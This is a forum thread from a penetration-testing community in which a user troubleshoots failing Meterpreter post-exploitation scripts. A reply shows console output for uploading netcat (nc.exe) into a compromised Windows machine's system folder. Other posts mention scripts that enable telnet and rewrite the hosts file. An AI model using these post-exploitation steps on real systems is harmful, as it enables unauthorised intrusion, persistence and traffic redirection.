Results 1 to 3 of 3

Thread: meterperter srcipts not functioning.

  1. #1
    Join Date
    Feb 2010

    Default meterperter srcipts not functioning.

    once i have a meterperter shell open a vast majority of the scripts don't work.
    here is what happens when I run
    "upload /root/nc.exe

    core_channel_open: Operation failed: 3

    if I run
    run gettelnet -e
    I get ...
    [*] Windows Telnet Server Enabler Meterpreter Script
    [-] Error in script: ArgumentError wrong number of arguments (1 for 0)

    hostsedit runs fine, but it does not redirect the hosts. (ie run hostsedit -e,Microsoft Corporation dosen't work, its still goes to
    but I may have misunderstood the purpose of the this script.

    running remotewinenum runns all the commands fine, but there is no log is empty.
    ( checked where it was saved to and confirmed the command line was correct)
    same with wineum.
    it can tell if its a VM, and if the UAC is on, but nothing else.

    I've google these problems and found nothing of use.

  2. #2
    Good friend of the forums espreto's Avatar
    Join Date
    Mar 2010

    Default Re: meterperter srcipts not functioning.

    Specify the destination.


    meterpreter > upload /pentest/windows-binaries/tools/nc.exe[*] uploading : /pentest/windows-binaries/tools/nc.exe -> /pentest/windows-binaries/tools/nc.exe
    [-] core_channel_open: Operation failed: 3
    meterpreter > upload /pentest/windows-binaries/tools/nc.exe C://Windows[*] uploading : /pentest/windows-binaries/tools/nc.exe -> C://Windows[*] uploaded : /pentest/windows-binaries/tools/nc.exe -> C://Windows\nc.exe
    meterpreter >

    Last edited by espreto; 07-14-2010 at 03:14 AM.
    (gdb) disass m(y_br)ain


  3. #3
    Join Date
    Feb 2010

    Default Re: meterperter srcipts not functioning.

    Ah thank you! that solves the upload script.
    (can't believe I didn't see that)

Similar Threads

  1. Non functioning network card on a presario C700
    By race12001 in forum OLD BackTrack 4 NON working hardware
    Replies: 1
    Last Post: 11-30-2009, 11:53 AM
  2. Brain no longer functioning.....
    By squishyalt in forum OLD General IT Discussion
    Replies: 12
    Last Post: 01-15-2009, 04:19 PM
  3. Atheros AR5007EG not functioning in BT
    By skiamakhe in forum OLD Newbie Area
    Replies: 33
    Last Post: 12-21-2007, 02:16 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts